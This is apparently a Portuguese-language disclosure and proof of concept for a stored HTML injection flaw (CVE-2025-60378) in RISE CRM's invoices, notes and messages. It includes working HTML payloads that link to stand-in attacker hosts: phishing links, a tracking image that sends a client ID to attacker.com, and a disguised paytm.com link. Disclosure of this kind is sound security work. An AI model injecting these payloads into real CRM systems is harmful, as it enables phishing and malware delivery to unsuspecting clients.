
Prova de conceito para injeção de HTML armazenada no RISE CRM, demonstrando como usuários autenticados podem injetar HTML malicioso em faturas e mensagens, levando a phishing e distribuição de malware por meio de e-mails e PDFs automatizados.
⚠️ Aviso de Segurança
Uma vulnerabilidade crítica de Injeção de HTML Armazenada que afeta faturas, mensagens e comunicações automatizadas
Uma vulnerabilidade crítica de Injeção de HTML Armazenada foi descoberta no RISE Ultimate Project Manager & CRM que permite que usuários autenticados injetem HTML malicioso em itens de linha de faturas, notas de clientes e módulos de mensagens. Esse conteúdo injetado persiste no banco de dados e é automaticamente renderizado em e-mails voltados ao cliente, PDFs e comunicações de chat, possibilitando ataques de phishing em larga escala, comprometimento de e-mail corporativo e entrega de malware via e-mail/PDF.
| Atributo | Valor |
|---|---|
| ID CVE | CVE-2025-60378 |
| Tipo | Injeção de HTML Armazenada |
| CWE | CWE-79 |
| Vetor de Ataque | Rede/Remoto |
| Autenticação | Necessária (Privilégio Baixo) |
| Interação do Usuário | Nenhuma |
| Severidade | ALTA |
| CVSS v3.1 | 8.1 - Alta |
| Descobridor | Ajansha Shankar |
O RISE CRM não sanitiza e codifica adequadamente o conteúdo HTML em vários campos editáveis pelo usuário, incluindo faturas, mensagens e notas de clientes. Quando usuários autenticados injetam payloads HTML nesses campos, o conteúdo é armazenado no banco de dados sem filtragem adequada. Posteriormente, esse HTML malicioso é automaticamente renderizado em e-mails voltados ao cliente, anexos PDF e módulos de mensagens/chat sem escape adequado. Faturas recorrentes e mensagens automatizadas amplificam o ataque ao distribuir conteúdo malicioso para múltiplos destinatários simultaneamente.
| Fator | Impacto | Explicação |
|---|---|---|
| Confidencialidade | 🔴 ALTA | Credenciais de clientes e dados sensíveis podem ser coletados via phishing |
| Integridade | 🔴 ALTA | Conteúdo malicioso pode modificar a percepção de comunicações e relações comerciais |
| Disponibilidade | 🟡 BAIXA | Impacto direto limitado na disponibilidade do sistema |
Um atacante com acesso de gerente de projeto de baixo privilégio cria uma fatura com HTML malicioso:
<a href="https://attacker.com/fake-payment">Click here to view payment status</a>
A fatura é enviada para mais de 100 clientes via e-mail automatizado. Todos os clientes recebem o que parece ser uma fatura legítima direcionando-os para um site de phishing. O atacante coleta credenciais de múltiplas vítimas simultaneamente.
Um atacante injeta HTML malicioso em uma mensagem de cliente:
<img src="https://attacker.com/track.gif?user=CLIENT_ID">
<a href="https://malware.com">Download Updated Project Files</a>
Todos os membros da equipe e clientes recebem a mensagem no chat, clicando em links para baixar malware.
Um atacante configura uma fatura recorrente com payload de entrega de malware. Todo mês, os clientes recebem automaticamente faturas com conteúdo malicioso incorporado, fornecendo um vetor de ataque persistente.
Navegue até: Painel do RISE CRM → Faturas/Mensagens → Criar Nova
<a href="https://attacker.com">Click here to view invoice</a>
<a href="https://evil.com" target="_blank">
<img src="https://media1.giphy.com/media/v1.Y2lkPTc5MGI3NjExbzg4OXRuZHd4MXF0bWNqa3BvN2pzbWdqMzRxZHc5bHJpbXpucHNtaSZlcD12MV9pbnRlcm5hbF9naWZfYnlfaWQmY3Q9Zw/9PgvV8ale90lQwfQTZ/giphy.gif">
</a>
<h1><font color=red>Visit Our New WebSite</font></h1>
<h3><mark><a href="https://evil.com">https://www.paytm.com/</a></mark></h3>
✅ HTML injetado é renderizado em e-mails, PDFs e mensagens sem escape ✅ Links são clicáveis e redirecionam para sites do atacante ✅ Imagens carregam de servidores controlados pelo atacante ✅ O conteúdo persiste em todas as comunicações futuras com clientes ✅ A distribuição recorrente alcança múltiplos destinatários automaticamente